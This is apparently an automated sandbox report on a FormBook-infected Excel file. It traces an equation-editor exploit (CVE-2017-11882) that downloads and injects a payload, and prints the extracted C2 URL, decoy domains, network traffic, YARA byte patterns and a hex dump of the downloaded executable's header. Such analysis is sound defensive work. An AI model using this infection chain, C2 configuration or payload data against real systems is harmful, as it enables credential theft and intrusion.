Play interactive tour

Edit tour

Windows Analysis Report oustanding 03082921.xlsx

Overview

General Information

Sample Name:	oustanding 03082921.xlsx
Analysis ID:	458692
MD5:	643fc978b1f9e32668a88202a7091266
SHA1:	ee970a6713bd017fd118a1eb54a237339c4fd579
SHA256:	e3469b3d96e6316114395abe8caef91aa9ac9edac2d701c2d64981d3c0dfc5f0
Tags:	FormbookVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Execution from Suspicious Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses netsh to modify the Windows network and firewall settings

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2768 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2444 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 3020 cmdline: 'C:\Users\Public\vbc.exe' MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)

vbc.exe (PID: 2224 cmdline: C:\Users\Public\vbc.exe MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)

explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

netsh.exe (PID: 1428 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: 784A50A6A09C25F011C3143DDD68E729)

cmd.exe (PID: 1144 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x4f0560:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x4f08ea:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x517780:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x517b0a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x4fc5fd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x52381d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4fc0e9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x523309:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x4fc6ff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x52391f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x4fc877:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x523a97:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x4f1302:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x518522:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x4fb364:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x522584:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x4f207a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x51929a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x5016ef:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x52890f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x502792:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4fe621:$sqlite3step: 68 34 1C 7B E1 0x4fe734:$sqlite3step: 68 34 1C 7B E1 0x525841:$sqlite3step: 68 34 1C 7B E1 0x525954:$sqlite3step: 68 34 1C 7B E1 0x4fe650:$sqlite3text: 68 38 2A 90 C5 0x4fe775:$sqlite3text: 68 38 2A 90 C5 0x525870:$sqlite3text: 68 38 2A 90 C5 0x525995:$sqlite3text: 68 38 2A 90 C5 0x4fe663:$sqlite3blob: 68 53 D8 7F 8C 0x4fe78b:$sqlite3blob: 68 53 D8 7F 8C 0x525883:$sqlite3blob: 68 53 D8 7F 8C 0x5259ab:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 3020	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7.2.vbc.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.vbc.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
7.2.vbc.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
7.2.vbc.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.vbc.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 13.229.216.142, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2444, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2444, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2444, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3020

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Multi AV Scanner detection for domain / URL

Show sources

Source: adultpeace.com

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: oustanding 03082921.xlsx

ReversingLabs: Detection: 26%

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Source: 7.2.vbc.exe.400000.1.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: netsh.pdb source: vbc.exe, 00000007.00000002.2198845306.00000000004E9000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	6_2_00409A40
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	6_2_00409A50
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	6_2_00409B42
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	6_2_00409B50
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi	7_2_00416282
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx	7_2_00406A94
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi	9_2_00206282
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop ebx	9_2_001F6A95

Source: global traffic

DNS query: name: www.cleanxcare.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.229.216.142:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.229.216.142:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 69MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.adultpeace.com/p2io/

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Aug 2021 14:50:43 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Tue, 03 Aug 2021 14:09:54 GMTETag: "146600-5c8a83d6b91fb"Accept-Ranges: bytesContent-Length: 1336832Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d4 4c 09 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 70 10 00 00 f4 03 00 00 00 00 00 ca 8f 10 00 00 20 00 00 00 a0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 14 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 8f 10 00 4f 00 00 00 00 a0 10 00 a0 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 14 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 6f 10 00 00 20 00 00 00 70 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 f0 03 00 00 a0 10 00 00 f2 03 00 00 72 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 